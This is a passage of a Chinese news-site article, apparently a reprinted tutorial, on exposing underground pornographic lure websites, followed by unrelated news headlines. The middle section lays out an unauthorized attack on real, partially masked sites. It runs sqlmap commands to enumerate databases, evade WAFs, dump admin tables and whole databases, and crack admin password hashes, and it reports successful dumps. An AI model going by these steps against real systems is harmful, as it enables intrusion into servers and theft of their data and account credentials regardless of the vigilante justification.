-
拼客学院陈鑫杰:揭秘地下色情诱导网站,上车吧!
关键字: 揭秘地下色情诱导网站4、漏洞挖掘
如果按照正常的灰产打击流程,最直接的方法就是采用“钓鱼执法”,例如直接微信或者支付宝支付,然后看看能否加到好友,继而直接揪出幕后运营者(如果对方用的小号,并且腾讯和阿里不介入,此方法估计走不通)。
所以,在这之前,我们先看看能否在技术上进行突破。例如,能否通过拿到后台数据库,找到后台管理页面,直接接管网站,或者通过数据库找到更加详细的管理员账号信息等等,甚至通过服务器提权拿到整个服务器权限;而实现这些的前提是:能否找到这套“色情CMS”的漏洞?
考虑到这类Web软件偏“地下流传”,不像知名的discuz论坛,有很多公开漏洞和渗透工具可以直接利用。所以,先用Web漏扫看看有没有能否找到常规漏洞。先对托管在国外的几个色情网站动手,发现都是PHP+MySQL架构,很多在Windows+IIS上面跑,而且幸运的是,大体都能爆出SQL注入和XSS跨站脚本漏洞,当然,这些漏洞能不能用,还得进一步验证。
(注明:上面提到的漏扫,Burp/AWVS/Appscan随意,更具体的使用这里省去)
5、SQL注入渗透
接下来,先手工找几个注入点看看,点击网站的分类列表,可以得到类似“php?id=x“的链接=>
这里收集了不同网站的一批注入点,然后我们拿神器SQLmap出来溜一圈。不同网站防护情况不同(例如安装了waf),注入的效果是不同的,不能一条指令走到黑,需要调整注入的参数,例如是否加长时间延迟、是否采用随机头部、是否加大注入级别。按照这个思路,大概需要用到这些指令:
① SQL注入得到数据库和管理员信息
root@kali:~# sqlmap.py -u http://txxxcom/list.php?id=1 --dbs --users
root@kali:~# sqlmap.py -u http://txxxcom/list.php?id=1 --dbs --users --dbms mysql
root@kali:~# sqlmap.py -u http://txxxcom/list.php?id=1 --dbs --users --time-sec 2 --dbms mysql --level=2 --risk=2 --random-agent
②根据注入得到的数据库,获取数据库里面的数据表
sqlmap.py -u http://txxxcom/list.php?id=1 --tables -D “aaaaaa“
sqlmap.py -u http://txxxcom/list.php?id=1 --tables -D “aaaaaa“ --random-agent
③获取管理员数据表或者暴力脱裤
sqlmap.py -u http://txxxcom/list.php?id=1 --dump -T “xxadminxx“ -D “aaaaaa“
sqlmap.py -u http://txxxcom/list.php?id=1 --dbms mysql --dump-all -D “aaaaaa“
(注入失败)
(注入成功,正在下载数据库和获取管理员账号密码)
(注入成功,进行管理员密码破解,这里哈希值没跑出来,需要借助在线MD5工具破解)
成功的并且dump数据库下来的部分网站截图:
- 原标题:[冇眼睇]揭秘地下色情诱导网站,上车吧! 本文仅代表作者个人观点。
- 责任编辑:李泠
-
“至少一代人不会把西欧视为合作伙伴” 评论 64“美国居然在锯自己骑着的那根树枝,蠢得可怕” 评论 190换一种方式,让国宝“回家” 评论 119矛头直指哈尔科夫,普京首次公开俄军意图 评论 199普京特地去了趟哈尔滨,东北-远东合作前景如何? 评论 234最新闻 Hot
-
内塔尼亚胡遭以战时内阁成员下“最后通牒”
-
“至少一代人不会把西欧视为合作伙伴”
-
换一种方式,让国宝“回家”
-
对抗中国?菲律宾加购5艘日本大型巡逻船
-
“我讨厌‘一带一路’,因为这绝妙的构想不是我们提出的”
-
斯洛伐克总理菲佐遭枪击后,他收到死亡威胁
-
12月6日前裁决,TikTok和美司法部要求法院启动快速通道
-
矛头直指哈尔科夫,普京首次公开俄军意图
-
“我们不承认台湾,今后也不会”
-
加拿大果然想跟,声称“不能给中国留后门…”
-
“美国居然在锯自己骑着的那根树枝,蠢得可怕”
-
法国邀请俄罗斯,英美不满
-
又在搞事,马科斯称菲律宾将“强力捍卫领土”
-
泽连斯基承认:我们很多旅都打光了...
-
中俄联合声明重量级要点,不只有图们江出海口
-
中国废食用油也被刁难,主要美企发声
-